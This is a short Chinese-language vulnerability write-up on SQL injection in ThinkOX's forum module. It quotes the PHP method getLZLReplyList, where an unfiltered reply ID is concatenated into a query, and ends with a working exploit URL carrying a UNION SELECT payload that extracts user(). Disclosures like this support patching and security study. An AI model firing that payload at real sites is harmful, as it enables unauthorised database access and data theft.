Thinkox 最新版 SQL 注入

ThinkOX参数未过滤导致SQL注入漏洞。
/Application/Forum/Model/ForumLzlReplyModel.class.php

public function getLZLReplyList($to_f_reply_id, $order, $page=1, $limit)

    {

        $list = S('post_replylzllist_' . $to_f_reply_id);

        if ($list == null) {

            $list = D('forum_lzl_reply')->where('is_del=0 and to_f_reply_id=' . $to_f_reply_id)->order($order)->select();

            foreach ($list as $k => &$v) {

                $v['userInfo'] = query_user(array('avatar128', 'nickname', 'uid', 'space_url', 'icons_html'), $v['uid']);

                $v['content'] = op_t($v['content']);

            }

            unset($v);

            S('post_replylzllist_' . $to_f_reply_id, $list, 60);

        }

        $list = getPage($list, $limit, $page);

        return $list;

    }

其中

$list = D('forum_lzl_reply')->where('is_del=0 and to_f_reply_id=' . $to_f_reply_id)->order($order)->select();

未经过过滤带入SQL语句导致注入。

exp:

http://0day5.com/thinkox/index.php?s=/forum/lzl/lzllist/to_f_reply_id/1%20and%201=2)union%20select%201,2,3,4,user(),6,7,8,9%23.html

发表评论